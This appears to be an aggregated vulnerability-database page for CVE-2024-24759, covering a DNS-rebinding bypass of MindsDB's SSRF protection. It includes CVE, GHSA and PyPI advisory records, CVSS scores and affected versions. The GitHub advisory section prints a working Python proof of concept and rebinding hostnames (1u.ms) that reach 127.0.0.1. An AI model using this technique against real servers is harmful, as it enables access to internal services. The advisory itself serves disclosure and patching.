cvelistv5 - cve-2024-24759

cve-2024-24759

Vulnerability from cvelistv5

Published

2024-09-05 16:30

Modified

2024-09-05 17:46

Severity

9.3 (Critical) - cvssV3_1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Summary

MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding

References

Source	URL	Tags
security-advisories@github.com	https://github.com/mindsdb/mindsdb/commit/5f7496481bd3db1d06a2d2e62c0dce960a1fe12b	Patch
security-advisories@github.com	https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr	Exploit, Vendor Advisory

Impacted products

Vendor	Product
mindsdb	mindsdb

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "mindsdb",
            "vendor": "mindsdb",
            "versions": [
              {
                "lessThan": "23.12.4.2",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-24759",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-05T17:45:02.937898Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-05T17:46:08.516Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "mindsdb",
          "vendor": "mindsdb",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 23.12.4.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-09-05T16:30:38.659Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr"
        },
        {
          "name": "https://github.com/mindsdb/mindsdb/commit/5f7496481bd3db1d06a2d2e62c0dce960a1fe12b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/mindsdb/mindsdb/commit/5f7496481bd3db1d06a2d2e62c0dce960a1fe12b"
        }
      ],
      "source": {
        "advisory": "GHSA-4jcv-vp96-94xr",
        "discovery": "UNKNOWN"
      },
      "title": "MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-24759",
    "datePublished": "2024-09-05T16:30:38.659Z",
    "dateReserved": "2024-01-29T20:51:26.010Z",
    "dateUpdated": "2024-09-05T17:46:08.516Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-24759\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-09-05T17:15:12.380\",\"lastModified\":\"2024-09-06T13:06:18.623\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch.\"},{\"lang\":\"es\",\"value\":\"MindsDB es una plataforma para crear inteligencia artificial a partir de datos empresariales. Antes de la versi\u00f3n 23.12.4.2, un actor de amenazas pod\u00eda eludir la protecci\u00f3n contra falsificaci\u00f3n de solicitudes del lado del servidor en todo el sitio web con DNS Rebinding. La vulnerabilidad tambi\u00e9n puede provocar una denegaci\u00f3n de servicio. La versi\u00f3n 23.12.4.2 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\",\"baseScore\":9.3,\"baseSeverity\":\"CRITICAL\"},\"exploitabilityScore\":3.9,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"23.12.4.2\",\"matchCriteriaId\":\"7466EAB9-6E4E-482B-91AF-D4150D6DF97C\"}]}]}],\"references\":[{\"url\":\"https://github.com/mindsdb/mindsdb/commit/5f7496481bd3db1d06a2d2e62c0dce960a1fe12b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Aliases

CVE-2024-24759

JSON

To clipboard

{
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2024-24759"
      ],
      "id": "GSD-2024-24759",
      "modified": "2024-01-30T06:03:12.576881Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2024-24759",
        "STATE": "RESERVED"
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
          }
        ]
      }
    }
  }
}

ghsa-4jcv-vp96-94xr

Vulnerability from github

Published

2024-09-05 16:37

Modified

2024-09-05 18:39

Severity

9.3 (Critical) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
7.8 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:L

Summary

MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding

Details

Summary

DNS rebinding is a method of manipulating resolution of domain names to let the initial DNS query hits an address and the second hits another one. For instance the host make-190.119.176.200-rebind-127.0.0.1-rr.1u.ms would be initially resolved to 190.119.176.200 and the next DNS issue to 127.0.0.1. Please notice the following in the latest codebase:

```python def is_private_url(url: str): """ Raises exception if url is private

:param url: url to check
"""

hostname = urlparse(url).hostname
if not hostname:
    # Unable to find hostname in url
    return True
ip = socket.gethostbyname(hostname)
return ipaddress.ip_address(ip).is_private

```

As you can see, during the call to is_private_url() the initial DNS query would be issued by ip = socket.gethostbyname(hostname) to an IP (public one) and then due to DNS Rebinding, the next GET request would goes to the private one.

PoC

```python from flask import Flask, request, jsonify from urllib.parse import urlparse import socket import ipaddress import requests

app = Flask(name)

def is_private_url(url: str): """ Raises exception if url is private

:param url: url to check
"""

hostname = urlparse(url).hostname
if not hostname:
    # Unable to find hostname in url
    return True
ip = socket.gethostbyname(hostname)
if ipaddress.ip_address(ip).is_private:
    raise Exception(f"Private IP address found for {url}")

@app.route("/", methods=["GET"]) def index(): return "http://127.0.0.1:5000/check_private_url?url=https://www.google.Fr"

@app.route("/check_private_url", methods=["GET"]) def check_private_url(): url = request.args.get("url")

if not url:
    return jsonify({"error": 'Missing "url" parameter'}), 400

try:
    is_private_url(url)
    response = requests.get(url)

    return jsonify(
        {
            "url": url,
            "is_private": False,
            "text": response.text,
            "status_code": response.status_code,
        }
    )
except Exception as e:
    return jsonify({"url": url, "is_private": True, "error": str(e)})

if name == "main": app.run(debug=True)

```

After running the poc.py with flask installed, consider visiting the following URLs:

http://127.0.0.1:5000/check_private_url?url=https://www.example.com since it is in the public space, you would get is_private: false and the GET request would be issued to the www.Example.com website.
http://127.0.0.1:5000/check_private_url?url=http://localhost:8667, this one the address is private, you would get is_private: true
http://127.0.0.1:5000/check_private_url?url=http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/ But this one, it initially returns the public IP 190.119.176.214 and then DNS rebind into the network location 127.0.0.1:8667.

I set up a simple HTTP server at 127.0.0.1:8667, you can notice the results of the PoC in the next screenshot:

``` { "is_private": false, "status_code": 200, "text": "

\npoc.py\n

\n", "url": "http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/" }

```

Impact

Bypass the SSRF protection on the whole website with DNS Rebinding.
DoS too.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mindsdb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "23.12.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24759"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-350",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-05T16:37:56Z",
    "nvd_published_at": "2024-09-05T17:15:12Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nDNS rebinding is a method of manipulating resolution of domain names to let the initial DNS query hits an address and the second hits another one. For instance the host `make-190.119.176.200-rebind-127.0.0.1-rr.1u.ms`  would be initially resolved to `190.119.176.200` and the next DNS issue to `127.0.0.1`. Please notice the following in the latest codebase:\n\n```python\ndef is_private_url(url: str):\n    \"\"\"\n    Raises exception if url is private\n\n    :param url: url to check\n    \"\"\"\n\n    hostname = urlparse(url).hostname\n    if not hostname:\n        # Unable to find hostname in url\n        return True\n    ip = socket.gethostbyname(hostname)\n    return ipaddress.ip_address(ip).is_private\n\n``` \n\nAs you can see, during the call to `is_private_url()` the initial DNS query would be issued by `ip = socket.gethostbyname(hostname)` to an IP (public one) and then due to DNS Rebinding, the next GET request would goes to the private one.\n\n### PoC\n\n```python\nfrom flask import Flask, request, jsonify\nfrom urllib.parse import urlparse\nimport socket\nimport ipaddress\nimport requests\n\napp = Flask(__name__)\n\n\ndef is_private_url(url: str):\n    \"\"\"\n    Raises exception if url is private\n\n    :param url: url to check\n    \"\"\"\n\n    hostname = urlparse(url).hostname\n    if not hostname:\n        # Unable to find hostname in url\n        return True\n    ip = socket.gethostbyname(hostname)\n    if ipaddress.ip_address(ip).is_private:\n        raise Exception(f\"Private IP address found for {url}\")\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n    return \"http://127.0.0.1:5000/check_private_url?url=https://www.google.Fr\"\n\n\n@app.route(\"/check_private_url\", methods=[\"GET\"])\ndef check_private_url():\n    url = request.args.get(\"url\")\n\n    if not url:\n        return jsonify({\"error\": \u0027Missing \"url\" parameter\u0027}), 400\n\n    try:\n        is_private_url(url)\n        response = requests.get(url)\n\n        return jsonify(\n            {\n                \"url\": url,\n                \"is_private\": False,\n                \"text\": response.text,\n                \"status_code\": response.status_code,\n            }\n        )\n    except Exception as e:\n        return jsonify({\"url\": url, \"is_private\": True, \"error\": str(e)})\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n\n```\n\nAfter running the poc.py with flask installed, consider visiting the following URLs:\n\n1. http://127.0.0.1:5000/check_private_url?url=https://www.example.com since it is in the public space, you would get `is_private: false` and the GET request would be issued to the www.Example.com website.\n3. http://127.0.0.1:5000/check_private_url?url=http://localhost:8667, this one the address is private, you would get `is_private: true`\n4. http://127.0.0.1:5000/check_private_url?url=http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/ But this one, it initially returns the public IP `190.119.176.214` and then DNS rebind into the network location `127.0.0.1:8667`.\n\nI set up a simple HTTP server at `127.0.0.1:8667`, you can notice the results of the PoC in the next screenshot:\n\n```\n{\n  \"is_private\": false,\n  \"status_code\": 200,\n  \"text\": \"\u003cpre\u003e\\n\u003ca href=\\\"poc.py\\\"\u003epoc.py\u003c/a\u003e\\n\u003c/pre\u003e\\n\",\n  \"url\": \"http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/\"\n}\n\n```\n\n\n### Impact\n - Bypass the SSRF protection on the whole website with DNS Rebinding.\n - DoS too.\n",
  "id": "GHSA-4jcv-vp96-94xr",
  "modified": "2024-09-05T18:39:00Z",
  "published": "2024-09-05T16:37:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24759"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mindsdb/mindsdb/commit/5f7496481bd3db1d06a2d2e62c0dce960a1fe12b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mindsdb/mindsdb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "MindsDB Vulnerable to Bypass of SSRF Protection with DNS Rebinding"
}

pysec-2024-74

Vulnerability from pysec

Published

2024-09-05 17:15

Modified

2024-09-06 15:22

Severity

9.1 (Critical) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Details

MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch.

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mindsdb",
        "purl": "pkg:pypi/mindsdb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5f7496481bd3db1d06a2d2e62c0dce960a1fe12b"
            }
          ],
          "repo": "https://github.com/mindsdb/mindsdb",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "23.12.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.6.5",
        "0.6.6",
        "0.6.7",
        "0.6.8",
        "0.6.9",
        "0.7.0",
        "0.7.1",
        "0.7.2",
        "0.7.3",
        "0.7.4",
        "0.7.5",
        "0.7.6",
        "0.7.7",
        "0.7.8",
        "0.7.9",
        "0.8.0",
        "0.8.1",
        "0.8.2",
        "0.8.3",
        "0.8.4",
        "0.8.5",
        "0.8.6",
        "0.8.7",
        "0.8.8",
        "0.8.9",
        "0.8.9.1",
        "0.8.9.2",
        "0.8.9.3",
        "0.8.9.4",
        "0.8.9.5",
        "0.8.9.6",
        "0.8.9.7",
        "0.8.9.8",
        "0.9.0.0",
        "0.9.0.1",
        "0.9.1.0",
        "0.9.2.0",
        "1.0",
        "1.0.1",
        "1.0.2",
        "1.0.3",
        "1.0.4",
        "1.0.5",
        "1.0.6",
        "1.0.7",
        "1.0.8",
        "1.0.9",
        "1.1.0",
        "1.1.2",
        "1.1.3",
        "1.1.7",
        "1.1.9",
        "1.10.0",
        "1.10.2",
        "1.10.3",
        "1.11.0",
        "1.11.2",
        "1.11.3",
        "1.11.4",
        "1.11.5",
        "1.11.8",
        "1.12.0",
        "1.12.1",
        "1.12.2",
        "1.12.3",
        "1.12.4",
        "1.12.5",
        "1.12.7",
        "1.12.8",
        "1.12.9",
        "1.13.0",
        "1.13.10",
        "1.13.11",
        "1.13.12",
        "1.13.15",
        "1.13.2",
        "1.13.3",
        "1.13.4",
        "1.13.5",
        "1.13.6",
        "1.13.7",
        "1.13.8",
        "1.13.9",
        "1.14.0",
        "1.14.1",
        "1.14.2",
        "1.14.3",
        "1.14.4",
        "1.15.1",
        "1.15.2",
        "1.15.6",
        "1.16.0",
        "1.16.1",
        "1.16.2",
        "1.17.0",
        "1.17.1",
        "1.17.2",
        "1.17.3",
        "1.17.4",
        "1.17.6",
        "1.17.8",
        "1.17.9",
        "1.18.0",
        "1.18.1",
        "1.18.2",
        "1.18.3",
        "1.18.5",
        "1.18.6",
        "1.18.7",
        "1.19.0",
        "1.19.1",
        "1.2.0",
        "1.2.1",
        "1.2.2",
        "1.2.3",
        "1.2.4",
        "1.2.5",
        "1.2.6",
        "1.2.8",
        "1.2.9",
        "1.20.0",
        "1.20.1",
        "1.21.0",
        "1.22.0",
        "1.23.0",
        "1.24.0",
        "1.24.1",
        "1.24.2",
        "1.25.0",
        "1.25.1",
        "1.25.2",
        "1.26.0",
        "1.26.1",
        "1.26.2",
        "1.26.3",
        "1.26.4",
        "1.26.5",
        "1.27.0",
        "1.27.1",
        "1.3.1",
        "1.3.2",
        "1.3.3",
        "1.3.4",
        "1.3.5",
        "1.3.6",
        "1.3.7",
        "1.4.0",
        "1.4.1",
        "1.4.10",
        "1.4.2",
        "1.4.3",
        "1.4.4",
        "1.4.5",
        "1.4.6",
        "1.4.7",
        "1.4.9",
        "1.5.0",
        "1.5.1",
        "1.5.2",
        "1.5.4",
        "1.6.0",
        "1.6.12",
        "1.6.13",
        "1.6.15",
        "1.6.17",
        "1.6.18",
        "1.6.3",
        "1.6.4",
        "1.6.5",
        "1.6.6",
        "1.6.7",
        "1.6.8",
        "1.7.0",
        "1.7.1",
        "1.7.10",
        "1.7.11",
        "1.7.12",
        "1.7.13",
        "1.7.14",
        "1.7.15",
        "1.7.16",
        "1.7.17",
        "1.7.18",
        "1.7.19",
        "1.7.2",
        "1.7.20",
        "1.7.21",
        "1.7.22",
        "1.7.23",
        "1.7.3",
        "1.7.5",
        "1.7.6",
        "1.7.7",
        "1.7.8",
        "1.7.9",
        "1.8.0",
        "1.8.2",
        "1.9.0",
        "1.9.1",
        "1.9.2",
        "1.9.3",
        "1.9.5",
        "1.9.6",
        "1.99.0",
        "1.99.1",
        "1.99.10",
        "1.99.11",
        "1.99.3",
        "1.99.4",
        "1.99.5",
        "1.99.6",
        "1.99.7",
        "1.99.8",
        "1.99.9",
        "2.0.0",
        "2.1.0",
        "2.1.2",
        "2.10.0",
        "2.10.1",
        "2.10.2",
        "2.11.0",
        "2.11.1",
        "2.11.2",
        "2.11.4",
        "2.12.0",
        "2.13.0",
        "2.13.1",
        "2.13.2",
        "2.13.3",
        "2.13.4",
        "2.13.5",
        "2.13.6",
        "2.13.7",
        "2.13.8",
        "2.14.0",
        "2.15.0",
        "2.17.1",
        "2.18.0",
        "2.19.0",
        "2.19.1",
        "2.19.2",
        "2.19.4",
        "2.19.5",
        "2.2.0",
        "2.2.1",
        "2.20.0",
        "2.20.1",
        "2.20.2",
        "2.21.0",
        "2.21.1",
        "2.21.2",
        "2.21.3",
        "2.22.0",
        "2.22.1",
        "2.22.2",
        "2.23.0",
        "2.24.0",
        "2.24.1",
        "2.25.0",
        "2.25.1",
        "2.25.2",
        "2.25.3",
        "2.26.0",
        "2.27.0",
        "2.28.0",
        "2.3.0",
        "2.30.0",
        "2.30.1",
        "2.31.0",
        "2.32.0",
        "2.33.0",
        "2.34.0",
        "2.35.0",
        "2.36.0",
        "2.37.0",
        "2.38.0",
        "2.39.0",
        "2.4.0",
        "2.40.0",
        "2.41.1",
        "2.41.2",
        "2.42.0",
        "2.42.1",
        "2.42.2",
        "2.43.0",
        "2.44.0",
        "2.45.0",
        "2.45.1",
        "2.45.2",
        "2.5.0",
        "2.50.0",
        "2.51.0",
        "2.51.1",
        "2.51.2",
        "2.52.0",
        "2.53.0",
        "2.54.0",
        "2.55.0",
        "2.55.1",
        "2.55.2",
        "2.56.0",
        "2.57.0",
        "2.58.0",
        "2.58.1",
        "2.58.2",
        "2.58.3",
        "2.59.0",
        "2.6.0",
        "2.6.1",
        "2.60.0",
        "2.60.1",
        "2.61.0",
        "2.62.0",
        "2.62.1",
        "2.62.2",
        "2.62.3",
        "2.62.4",
        "2.7.0",
        "2.7.1",
        "2.7.2",
        "2.8.0",
        "2.8.1",
        "2.8.3",
        "2.9.0",
        "2.9.1",
        "22.1.4.0",
        "22.1.4.1",
        "22.10.2.0",
        "22.10.2.1",
        "22.11.3.0",
        "22.11.3.2",
        "22.11.4.0",
        "22.11.4.1",
        "22.11.4.2",
        "22.11.4.3",
        "22.12.4.0",
        "22.12.4.2",
        "22.12.4.3",
        "22.2.1.0",
        "22.2.1.2",
        "22.2.2.0",
        "22.2.2.1",
        "22.2.4.0",
        "22.2.4.1",
        "22.3.1.0",
        "22.3.3.0",
        "22.3.4.0",
        "22.3.4.1",
        "22.3.4.2",
        "22.3.4.3",
        "22.3.5.0",
        "22.4.2.0",
        "22.4.2.1",
        "22.4.2.2",
        "22.4.3.0",
        "22.4.5.0",
        "22.5.1.0",
        "22.5.1.1",
        "22.5.1.2",
        "22.5.2.0",
        "22.5.4.0",
        "22.6.1.0",
        "22.6.1.1",
        "22.6.1.2",
        "22.6.2.0",
        "22.6.2.1",
        "22.6.2.2",
        "22.7.3.0",
        "22.7.3.1",
        "22.7.3.2",
        "22.7.3.3",
        "22.7.3.4",
        "22.7.4.0",
        "22.7.4.1",
        "22.7.5.0",
        "22.7.5.1",
        "22.8.2.0",
        "22.8.2.1",
        "22.8.3.0",
        "22.8.3.1",
        "22.8.4.0",
        "22.8.4.1",
        "22.8.5.0",
        "22.9.3.0",
        "22.9.3.1",
        "22.9.4.0",
        "22.9.5.1",
        "22.9.5.2",
        "22.9.5.3",
        "22.9.5.4",
        "23.1.3.0",
        "23.1.3.1",
        "23.1.3.2",
        "23.1.5.0",
        "23.10.2.0",
        "23.10.3.0",
        "23.10.3.1",
        "23.10.5.0",
        "23.11.1.0",
        "23.11.4.0",
        "23.11.4.1",
        "23.11.4.4a6",
        "23.12.4.0",
        "23.12.4.1",
        "23.2.1.0",
        "23.2.2.1",
        "23.2.3.0",
        "23.2.3.1",
        "23.2.4.0",
        "23.2.4.1",
        "23.2.4.2",
        "23.2.4.3",
        "23.3.2.0",
        "23.3.3.0",
        "23.3.3.1",
        "23.3.3.2",
        "23.3.3.3",
        "23.3.3.4",
        "23.3.3.5",
        "23.3.4.0",
        "23.3.5.0",
        "23.4.3.0",
        "23.4.3.1",
        "23.4.3.2",
        "23.4.4.0",
        "23.4.4.1",
        "23.4.4.2",
        "23.4.4.3",
        "23.4.4.4",
        "23.5.3.1",
        "23.5.3.2",
        "23.5.4.1",
        "23.6.1.1",
        "23.6.2.0",
        "23.6.3.0",
        "23.6.3.1",
        "23.6.4.0",
        "23.6.5.0",
        "23.6.5.1",
        "23.7.1.0",
        "23.7.2.0",
        "23.7.3.1",
        "23.7.4.0",
        "23.7.4.1",
        "23.8.1.0",
        "23.8.3.0",
        "23.9.1.0",
        "23.9.1.1",
        "23.9.2.0",
        "23.9.2.1",
        "23.9.3.0",
        "23.9.3.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24759",
    "GHSA-4jcv-vp96-94xr"
  ],
  "details": "MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch.",
  "id": "PYSEC-2024-74",
  "modified": "2024-09-06T15:22:53.971446+00:00",
  "published": "2024-09-05T17:15:00+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr"
    },
    {
      "type": "FIX",
      "url": "https://github.com/mindsdb/mindsdb/commit/5f7496481bd3db1d06a2d2e62c0dce960a1fe12b"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Action not permitted

cve-2024-24759

Vulnerability from cvelistv5

gsd-2024-24759

Vulnerability from gsd

ghsa-4jcv-vp96-94xr

Vulnerability from github

Summary

PoC

Impact

pysec-2024-74

Vulnerability from pysec

Tags